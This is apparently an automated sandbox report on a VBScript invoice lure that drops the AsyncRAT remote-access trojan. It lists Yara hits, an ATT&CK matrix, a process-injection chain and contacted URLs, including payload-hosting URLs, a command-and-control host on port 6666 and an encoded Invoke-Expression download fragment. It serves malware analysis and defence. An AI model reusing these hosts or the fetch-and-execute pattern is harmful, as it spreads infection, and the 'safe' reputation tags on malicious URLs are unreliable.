                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
                  Source: aspnet_compiler.exe, 00000009.00000003.749662018.0000000005145000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScripting121Scheduled Task/Job1Process Injection212Scripting121LSASS MemorySystem Information Discovery14Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder2Scheduled Task/Job1Obfuscated Files or Information121Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder2Software Packing1NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol113Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection212DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 359309 Sample: Invoice-ID-(882451).vbs Startdate: 27/02/2021 Architecture: WINDOWS Score: 100 52 Found malware configuration 2->52 54 Yara detected obfuscated html page 2->54 56 Yara detected AsyncRAT 2->56 58 4 other signatures 2->58 9 wscript.exe 1 2->9         started        12 mshta.exe 19 2->12         started        process3 signatures4 60 VBScript performs obfuscated calls to suspicious functions 9->60 14 mshta.exe 23 9->14         started        17 powershell.exe 13 12->17         started        process5 dnsIp6 46 ahmedadel.work 212.64.222.172, 49706, 49710, 49721 ATLAS-ASTR Turkey 14->46 20 powershell.exe 14 20 14->20         started        48 Writes to foreign memory regions 17->48 50 Injects a PE file into a foreign processes 17->50 24 conhost.exe 17->24         started        26 aspnet_compiler.exe 17->26         started        signatures7 process8 dnsIp9 42 ahmedadel.work 20->42 44 ia801503.us.archive.org 207.241.228.153, 443, 49715 INTERNET-ARCHIVEUS United States 20->44 38 C:\Users\user\AppData\Roaming\...\Run.hta, HTML 20->38 dropped 28 powershell.exe 24 20->28         started        31 conhost.exe 20->31         started        file10 process11 signatures12 62 Writes to foreign memory regions 28->62 64 Injects a PE file into a foreign processes 28->64 33 aspnet_compiler.exe 2 28->33         started        36 aspnet_compiler.exe 28->36         started        process13 dnsIp14 40 clayroot2016.linkpc.net 193.23.3.13, 49725, 6666 HOSTSLIM-GLOBAL-NETWORKNL unknown 33->40

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  10.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                  9.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ahmedadel.work/cairo/Encoding.txt0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txt...0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtLMEMX0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/ALL.txt0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/ALm0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txt0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtHmw0%Avira URL Cloudsafe
                  http://www.microsoft.co0%URL Reputationsafe
                  http://www.microsoft.co0%URL Reputationsafe
                  http://www.microsoft.co0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://ahmedadel.workx0%Avira URL Cloudsafe
                  https://ia801503.us.archive.orgx0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtt0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtY0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtf0%Avira URL Cloudsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  http://ahmedadel.work/cairo/Encoding.txt...s0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtndowsINetCookies0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Server.txt0%Avira URL Cloudsafe
                  http://ahmedadel.work0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txt?0%Avira URL Cloudsafe
                  http://w7icrosoft.comts/MicTiPCA_01.c0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  http://ahmedadel.work/cairo/Encoding.txtH0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtC:0%Avira URL Cloudsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://ahmedadel.work/cairo/Server.txtX0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txt00%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxf0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txt70%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtionalmw0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/Encoding.txtndows0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/ALL.txtX0%Avira URL Cloudsafe
                  http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jo0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  clayroot2016.linkpc.net
                  		193.23.3.13
                  		truefalse
                    		high
                    ahmedadel.work
                    		212.64.222.172
                    		truetrue
                      		unknown
                      ia801503.us.archive.org
                      		207.241.228.153
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://ahmedadel.work/cairo/Encoding.txttrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://ahmedadel.work/cairo/ALL.txttrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://ahmedadel.work/cairo/Server.txtfalse
                        • Avira URL Cloud: safe
                        		unknown
                        clayroot2016.linkpc.netfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://ahmedadel.work/cairo/Encoding.txt...mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ahmedadel.work/cairo/Encoding.txtLMEMXmshta.exe, 00000001.00000003.643767843.0000024D52A83000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ahmedadel.work/cairo/ALmmshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txtmshta.exe, 00000001.00000003.643922704.0000024D52395000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://certificates.godaddy.com/repository/0powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                            		high
                            http://ahmedadel.work/cairo/Encoding.txtHmwmshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.microsoft.copowershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ahmedadel.workxpowershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ia801503.us.archive.orgxpowershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ahmedadel.work/cairo/Encoding.txttmshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ahmedadel.work/cairo/Encoding.txtYwscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt0ypowershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpfalse
                              		high
                              https://ia801503.us.archive.org/13/items/startup_20210219/StartuXpowershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpfalse
                                		high
                                http://ahmedadel.work/cairo/Encoding.txtfwscript.exe, 00000000.00000002.637433590.000001CFFB767000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpfalse
                                  		high
                                  http://ahmedadel.work/cairo/Encoding.txt...smshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ahmedadel.work/cairo/Encoding.txtndowsINetCookiesmshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://certificates.godaddy.com/repository/gdig2.crt0powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.905111532.000001DEA5C11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.906066406.0000000005121000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.906122785.000002AA66FB1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904887989.0000000002C01000.00000004.00000001.sdmpfalse
                                      		high
                                      http://ahmedadel.workpowershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ahmedadel.work/cairo/Encoding.txt?wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpfalse
                                        		high
                                        http://crl.godaddy.com/gdig2s1-1597.crl0powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                          		high
                                          http://w7icrosoft.comts/MicTiPCA_01.cpowershell.exe, 00000002.00000002.917290171.000001DEBE1D8000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpfalse
                                            		high
